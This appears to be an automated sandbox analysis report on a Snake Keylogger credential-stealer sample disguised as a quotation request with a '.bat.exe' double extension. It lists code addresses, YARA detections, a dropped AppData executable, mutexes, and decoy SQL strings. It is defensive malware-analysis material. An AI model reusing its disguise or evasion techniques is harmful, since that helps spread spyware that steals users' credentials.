Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEF3B8 9_2_06DEF3B8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEF3A8 9_2_06DEF3A8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE8BA0 9_2_06DE8BA0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEEB08 9_2_06DEEB08
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE9328 9_2_06DE9328
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE0B20 9_2_06DE0B20
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DED0F8 9_2_06DED0F8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE0040 9_2_06DE0040
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE5018 9_2_06DE5018
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEF810 9_2_06DEF810
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DE0007 9_2_06DE0007
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DEF801 9_2_06DEF801
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DED999 9_2_06DED999
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 9_2_06DED9A8 9_2_06DED9A8
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 10_2_0111D51C 10_2_0111D51C
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 10_2_053D5020 10_2_053D5020
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 10_2_053D9360 10_2_053D9360
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 10_2_053D7FAE 10_2_053D7FAE
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 10_2_053DC520 10_2_053DC520
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 10_2_053DC51A 10_2_053DC51A
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 10_2_053DC4E7 10_2_053DC4E7
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 10_2_053D934F 10_2_053D934F
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0269D28B 14_2_0269D28B
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0269C1AB 14_2_0269C1AB
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0269C74B 14_2_0269C74B
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0269C47B 14_2_0269C47B
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0269CA1B 14_2_0269CA1B
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_026969A0 14_2_026969A0
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0269E988 14_2_0269E988
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_02693E09 14_2_02693E09
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_02696FC8 14_2_02696FC8
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0269CFBB 14_2_0269CFBB
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0269CCEB 14_2_0269CCEB
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_02699DE0 14_2_02699DE0
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_02695383 14_2_02695383
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_02693AA1 14_2_02693AA1
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0269F974 14_2_0269F974
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_026929EC 14_2_026929EC
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_06551E80 14_2_06551E80
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_06550B30 14_2_06550B30
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_065517A0 14_2_065517A0
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655FC68 14_2_0655FC68
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_06559C18 14_2_06559C18
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_06555028 14_2_06555028
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_06559548 14_2_06559548
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_06552968 14_2_06552968
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655E258 14_2_0655E258
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655E24A 14_2_0655E24A
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_06551E70 14_2_06551E70
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655DE00 14_2_0655DE00
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655EAF8 14_2_0655EAF8
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655E6B0 14_2_0655E6B0
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655E6AF 14_2_0655E6AF
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655EF60 14_2_0655EF60
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655EB08 14_2_0655EB08
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_06550B20 14_2_06550B20
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655178F 14_2_0655178F
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655F3B8 14_2_0655F3B8
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_06558BA0 14_2_06558BA0
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_06550040 14_2_06550040
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655F810 14_2_0655F810
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_06555018 14_2_06555018
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655F802 14_2_0655F802
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655003F 14_2_0655003F
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655D0F8 14_2_0655D0F8
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655CCA0 14_2_0655CCA0
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655D550 14_2_0655D550
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655D540 14_2_0655D540
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655DDFF 14_2_0655DDFF
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655D9A7 14_2_0655D9A7
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 14_2_0655D9A8 14_2_0655D9A8
Sample file is different than original file name gathered from version info
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1418858340.00000000057F0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1412513003.000000000127E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamerPzg.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1420336040.000000000A97D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePowerShell.EXEj% vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1420336040.000000000A97D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamerPzg.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1416830632.000000000434B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1415188848.000000000315D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000002.1419550863.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3825388086.0000000000FD7000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Binary or memory string: OriginalFilenamerPzg.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Uses 32bit PE files
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000009.00000002.3824755853.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1416830632.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 2440, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe PID: 7264, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: NuDUTBObHpKADz.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, ---.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, ---.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, ---.cs Base64 encoded string: 'RvaDBqLex+H7VQrltB7IHeqxo4wofVTOiAhtftTiQbn1Z/62t6lZAA=='
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, ---.cs Base64 encoded string: 'RvaDBqLex+H7VQrltB7IHeqxo4wofVTOiAhtftTiQbn1Z/62t6lZAA=='
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, qhA7Vpw3Pa7m92Y2sb.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, qhA7Vpw3Pa7m92Y2sb.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, l4lWgpboLH3dw1sHJl.cs Security API names: _0020.SetAccessControl
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, l4lWgpboLH3dw1sHJl.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, l4lWgpboLH3dw1sHJl.cs Security API names: _0020.AddAccessRule
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, qhA7Vpw3Pa7m92Y2sb.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, qhA7Vpw3Pa7m92Y2sb.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, l4lWgpboLH3dw1sHJl.cs Security API names: _0020.SetAccessControl
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, l4lWgpboLH3dw1sHJl.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, l4lWgpboLH3dw1sHJl.cs Security API names: _0020.AddAccessRule
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@20/25@3/3
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe File created: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2600:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Mutant created: \Sessions\1\BaseNamedObjects\upSDuQ
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1708:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:592:120:WilError_03
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe File created: C:\Users\user\AppData\Local\Temp\tmp8B51.tmp Jump to behavior
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.dr Binary or memory string: INSERT INTO [dbo].[CREDIT_PLAN] ([CREDIT_ID], [MATURITY_DATE], [MATURITY_SUM], [MATURITY_NOTE], [MODIF_DATE]) VALUES (@CREDIT_ID, @MATURITY_DATE, @MATURITY_SUM, @MATURITY_NOTE, @MODIF_DATE);
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.dr Binary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE], [INTEREST]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE, @INTEREST);
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.dr Binary or memory string: UPDATE [dbo].[Login] SET [User_id] = @User_id, [User_pass] = @User_pass WHERE (([User_id] = @Original_User_id) AND ([User_pass] = @Original_User_pass));
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.dr Binary or memory string: UPDATE [dbo].[CREDIT_PLAN] SET [CREDIT_ID] = @CREDIT_ID, [MATURITY_DATE] = @MATURITY_DATE, [MATURITY_SUM] = @MATURITY_SUM, [MATURITY_NOTE] = @MATURITY_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([MATURITY_ID] = @Original_MATURITY_ID) AND ((@IsNull_CREDIT_ID = 1 AND [CREDIT_ID] IS NULL) OR ([CREDIT_ID] = @Original_CREDIT_ID)) AND ([MATURITY_DATE] = @Original_MATURITY_DATE) AND ([MATURITY_SUM] = @Original_MATURITY_SUM) AND ((@IsNull_MATURITY_NOTE = 1 AND [MATURITY_NOTE] IS NULL) OR ([MATURITY_NOTE] = @Original_MATURITY_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.dr Binary or memory string: INSERT INTO [dbo].[PROD_PERIODS] ([PROD_CODE], [PROD_PERIOD]) VALUES (@PROD_CODE, @PROD_PERIOD);
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000000.00000000.1359257130.0000000000BD2000.00000002.00000001.01000000.00000003.sdmp, NuDUTBObHpKADz.exe.0.dr Binary or memory string: UPDATE [dbo].[INTEREST] SET [PROD_CODE] = @PROD_CODE, [PROD_PERIOD] = @PROD_PERIOD, [SUM_FROM] = @SUM_FROM, [SUM_TO] = @SUM_TO WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_PERIOD] = @Original_PROD_PERIOD) AND ([SUM_FROM] = @Original_SUM_FROM) AND ([SUM_TO] = @Original_SUM_TO));
